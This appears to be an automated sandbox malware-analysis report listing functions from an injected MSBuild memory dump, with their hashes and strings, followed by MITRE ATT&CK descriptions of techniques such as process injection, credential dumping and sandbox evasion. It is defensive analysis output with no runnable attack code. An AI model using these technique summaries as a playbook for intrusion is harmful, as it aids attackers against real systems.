Opcode Fuzzy Hash: 9d61ce5cba2ddafc39eb1aaa0eece16736b7b5cd4b4fcb06769f0db97789f659
Instruction Fuzzy Hash: 9F90027120140843E10071988444B46000597E0301F55C427A0524654DC655C9617621

Uniqueness

Uniqueness Score: -1.00%

Function 01032CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16bbb5adbc2a24885095c90f82e8ff277678ca0d4bcb8888ae27a17a223209bb
Instruction ID: 184ac764320d8cc91ec3eabc68d98984b576ad4e3e89585a6a17a6f56bbb1857
Opcode Fuzzy Hash: 16bbb5adbc2a24885095c90f82e8ff277678ca0d4bcb8888ae27a17a223209bb
Instruction Fuzzy Hash: 5590027120140403E10075D89448646000597E0301F55D422A5424555EC6A589A16231

Uniqueness

Uniqueness Score: -1.00%

Function 01032CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7dadaf237ecdf8d89b276aae24e2bb4592a192c3fcaf43db12de873e17a84e
Instruction ID: 0de3d4d7ef649937647422aebd3cc6f22efffbcd43b9f2eafbf52bbfa8eee452
Opcode Fuzzy Hash: bb7dadaf237ecdf8d89b276aae24e2bb4592a192c3fcaf43db12de873e17a84e
Instruction Fuzzy Hash: D090026160540403E14071989458706001597D0201F55D422A0424554DC6998B6567A1

Uniqueness

Uniqueness Score: -1.00%

Function 01032CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53798e2e0e193051a6697b847203bf78f7a216e7a6950a19ce7590dc23018d3a
Instruction ID: b71c938c8eacd23cb08c381d2cf9573de9901dd533f36293ab863a2af763106b
Opcode Fuzzy Hash: 53798e2e0e193051a6697b847203bf78f7a216e7a6950a19ce7590dc23018d3a
Instruction Fuzzy Hash: D190027120140403E10071989548707000597D0201F55D822A0824558DD69689616221

Uniqueness

Uniqueness Score: -1.00%

Function 01032F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95f64137acff97b91273ae6b2f7e48ba2ec28bdb4cc09abc37ba79c73c6eb584
Instruction ID: 174b17c03922f1e51dacb39f6de3d3a68ccdc80e56ed768f61acc18dbc086437
Opcode Fuzzy Hash: 95f64137acff97b91273ae6b2f7e48ba2ec28bdb4cc09abc37ba79c73c6eb584
Instruction Fuzzy Hash: 879002A134140443E10071988454B060005D7E1301F55C426E1464554DC659CD626226

Uniqueness

Uniqueness Score: -1.00%

Function 01032F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02a1a94b07ba715661958b098505b9455cfb3f5740d5257145013701bc66d8d2
Instruction ID: d0209701e1bb709a12450616b3ac4c403012cf11aac5ed6fbf3103d5a0fdb6f9
Opcode Fuzzy Hash: 02a1a94b07ba715661958b098505b9455cfb3f5740d5257145013701bc66d8d2
Instruction Fuzzy Hash: CA9002A121140043E10471988444706004597E1201F55C423A2554554CC5698D715225

Uniqueness

Uniqueness Score: -1.00%

Function 01032F90 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18bfd9c620eeca230bc09a2a91a0147e3187413e5eea695c31436f5e8a86b3f8
Instruction ID: f831dda85fdbd7bd294da8c61baadf56db787a246eb574e760333c0c8fd45708
Opcode Fuzzy Hash: 18bfd9c620eeca230bc09a2a91a0147e3187413e5eea695c31436f5e8a86b3f8
Instruction Fuzzy Hash: 0D90027120180403E1007198885470B000597D0302F55C422A1564555DC66589616671

Uniqueness

Uniqueness Score: -1.00%

Function 01032FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 524734f50f6bfab9bcb71283aba86908678f32d3e4cf71fcf9c6df7e6d5a16a4
Instruction ID: 80a89c33ee20cd620ae275a501db611bb045f05505fb4986869917e6ff26cb52
Opcode Fuzzy Hash: 524734f50f6bfab9bcb71283aba86908678f32d3e4cf71fcf9c6df7e6d5a16a4
Instruction Fuzzy Hash: C590027120180403E10071988848747000597D0302F55C422A5564555EC6A5C9A16631

Uniqueness

Uniqueness Score: -1.00%

Function 01032FB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45dd30a0442d7634fbbefd2ce0acf9e2edd007ac71eba1a759d5c94151a4a86b
Instruction ID: 70df9258ab1e9db126d69c14a8dfc53b42d43f7cb34e6078feca4f89827a806f
Opcode Fuzzy Hash: 45dd30a0442d7634fbbefd2ce0acf9e2edd007ac71eba1a759d5c94151a4a86b
Instruction Fuzzy Hash: 1890026160140043514071A8C8849064005BBE1211755C532A0D98550DC59989755765

Uniqueness

Uniqueness Score: -1.00%

Function 01032FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf94cf275b1d93a08260f700c3bd55b3540a487088b6351056822405b78eacb7
Instruction ID: 7a819d6c83df9f7a9da436a26922f1e482ac1ba75dab99a20f218b406a20d289
Opcode Fuzzy Hash: bf94cf275b1d93a08260f700c3bd55b3540a487088b6351056822405b78eacb7
Instruction Fuzzy Hash: 2C900261211C0043E20075A88C54B07000597D0303F55C526A0554554CC95589715621

Uniqueness

Uniqueness Score: -1.00%

Function 01032E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5838ac0640e63c801ddb32ebe488fa81541b069d0af8a997e634a0854195225
Instruction ID: 4e76fd061ae89067bb165a981d941ee9dd082001ea4f2d13210e91d4cfe58066
Opcode Fuzzy Hash: c5838ac0640e63c801ddb32ebe488fa81541b069d0af8a997e634a0854195225
Instruction Fuzzy Hash: D690026130140403E102719884546060009D7D1345F95C423E1824555DC6658A63A232

Uniqueness

Uniqueness Score: -1.00%

Function 01032E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0949b5e0a94e6df4b2421eb4eda538adfd722013fe0c9dd63c462c8fb756b0dc
Instruction ID: 924d2300b97699d4bdc720679622de23df601256b3a421ec59a9bba712415473
Opcode Fuzzy Hash: 0949b5e0a94e6df4b2421eb4eda538adfd722013fe0c9dd63c462c8fb756b0dc
Instruction Fuzzy Hash: 9290026160140503E10171988444616000A97D0241F95C433A1424555ECA658AA2A231

Uniqueness

Uniqueness Score: -1.00%

Function 01032EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df493650501f2f1e1c75b1165c11e8ce797a7fcebf8d8ea43a79f0f3c088b293
Instruction ID: 3c56c31c5552663faa6a5962f07686f91783ce9de8250f8cd7f89605dea36aed
Opcode Fuzzy Hash: df493650501f2f1e1c75b1165c11e8ce797a7fcebf8d8ea43a79f0f3c088b293
Instruction Fuzzy Hash: E39002B120140403E14071988444746000597D0301F55C422A5464554EC6998EE56765

Uniqueness

Uniqueness Score: -1.00%

Function 01032EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bd08d72a0a3eb1ffba1d256f43e4e6d56db2138a9ad6a4daf4b419e7c9f90b9
Instruction ID: 0271ac98b99515a018498dad07d0b22f759e7b57dedba680842821e8a1396d34
Opcode Fuzzy Hash: 2bd08d72a0a3eb1ffba1d256f43e4e6d56db2138a9ad6a4daf4b419e7c9f90b9
Instruction Fuzzy Hash: 139002A120180403E14075988844607000597D0302F55C422A2464555ECA698D616235

Uniqueness

Uniqueness Score: -1.00%

Function 01032C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: d16f16844a40778c201be2b2cbeec34b556c7ffde69767a6d3ca0b9cf8f861aa
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01032890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0103293C
___swprintf_l.LIBCMT ref: 0103295E
___swprintf_l.LIBCMT ref: 010329A3
___swprintf_l.LIBCMT ref: 0106A52E

Strings

::%hs%u.%u.%u.%u, xrefs: 0106A527
::ffff:0:%u.%u.%u.%u, xrefs: 0106A54E
:%u.%u.%u.%u, xrefs: 0106A5B8
ffff:, xrefs: 0106A504

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d220c0239b39114594c2349089e26458a8ccad54006a25d1898aab646d09b68d
Instruction ID: 5a0397f078503d4d736f8bb16aea11877b939cc7b1da4fe7a4d67facb897bf64
Opcode Fuzzy Hash: d220c0239b39114594c2349089e26458a8ccad54006a25d1898aab646d09b68d
Instruction Fuzzy Hash: 3951C7B5A04156BFDB11DF9C889097EFBFCBB88240B14816AF5E5E7641D334DE408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01027630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010646FC
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01064655
CLIENT(ntdll): Processing section info %ws..., xrefs: 01064787
Execute=1, xrefs: 01064713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01064725
ExecuteOptions, xrefs: 010646A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01064742

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: dde5ee3ef7b0d4a66f95a385cbaebc649f6648408f532682b8f8be51bedeb203
Instruction ID: 55a3e35675205820c868f08ba44766c45751f864f3db46e88396516ec5e8a3b0
Opcode Fuzzy Hash: dde5ee3ef7b0d4a66f95a385cbaebc649f6648408f532682b8f8be51bedeb203
Instruction Fuzzy Hash: CC51093160022A7AEB21EAA8DC89BED77E9BF68700F0400D9D685AB191D7719A458B51

Uniqueness

Uniqueness Score: -1.00%

Function 0103B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0103B6BF

Strings

-, xrefs: 0103B650
0, xrefs: 0103B66F
0, xrefs: 0103B695
+, xrefs: 0103B65A

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 6a655119e5d37d8a2d755f63d9f27d80268e15b1eec9f6fdff9e383241c44674
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 72819E70E052499EEF268F6CC8517EEBBE9EFC5328F18419AD8D1A7292C7348941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0102BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01067B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01067B7F
RTL: Re-Waiting, xrefs: 01067BAC

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: a00c6b35036193e5bfc75c358a3c79139e1dbf1531e6e82adcd3925e028c771e
Instruction ID: 183cd6f6b0a6c01ebfa89b7759117b3db2db94f35965a8e47ee2aed4d626b1d1
Opcode Fuzzy Hash: a00c6b35036193e5bfc75c358a3c79139e1dbf1531e6e82adcd3925e028c771e
Instruction Fuzzy Hash: 2241D2317047029FD760DE29C840F6AB7E9EF98720F100A5DE9DADB681DB72E9058B91

Uniqueness

Uniqueness Score: -1.00%

Function 0102B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0106728C

Strings

RTL: Resource at %p, xrefs: 010672A3
RTL: Re-Waiting, xrefs: 010672C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01067294

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: e2665ce89643803e7d43585ebf826455858eeebf6471bc4feca4cb8064475b0f
Instruction ID: 882e1812dc6fc63fba145516fd8fba8d8a3bba8b8228dd895d2ec386396bdebc
Opcode Fuzzy Hash: e2665ce89643803e7d43585ebf826455858eeebf6471bc4feca4cb8064475b0f
Instruction Fuzzy Hash: 1041E031700217ABD721DE29CC81FAAB7E9FF94714F140619F9D5AB280DB21F8468BD1

Uniqueness

Uniqueness Score: -1.00%

Function 01037D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01037E8B

Strings

+, xrefs: 01037DE8
-, xrefs: 01037DDD

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: dc1cabc3237106d8c256fd3009402b58cec379c1b8ef29705d37165cdfe01853
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 069174B1E0021A9EEB64DF6DC8816BEBBF9BFC4720F14465AE995A72C0D73099408761

Uniqueness

Uniqueness Score: -1.00%

Function 00FF9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 00FF9175
$, xrefs: 00FF9191

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 1401193eb515667a4bfe05dd1ebd37afe9e9427091ffa7adbd5b1d702ecfefe8
Instruction ID: 98220c52f74fec5a8705318fa8cebd3d67f1bc65a86ed038443adf404ef9d191
Opcode Fuzzy Hash: 1401193eb515667a4bfe05dd1ebd37afe9e9427091ffa7adbd5b1d702ecfefe8
Instruction Fuzzy Hash: 2C812C71D0026ADBDB71DB54CC44BEEB7B4AF08714F0041EAAA49B7290E7719E84DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0107CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0107CFBD

Strings

@4Cw@4Cw, xrefs: 0107CFD5, 0107CFDA, 0107CFF1
@, xrefs: 0107CF0A

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Cw@4Cw
API String ID: 4062629308-3101775584
Opcode ID: 4ec207019963a92f32f0bb4cf215bcd0610361a409bcc4508d3d349e3dfc383c
Instruction ID: d8c936c35ca63ceca54ea430e10dc1cef1211b18d38f7ecc711e2efedf767e88
Opcode Fuzzy Hash: 4ec207019963a92f32f0bb4cf215bcd0610361a409bcc4508d3d349e3dfc383c
Instruction Fuzzy Hash: B041DFB1D00219DFDB229FAAD844AAEBBF8FF54B00F00406AE995DF250D735D940CBA5

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

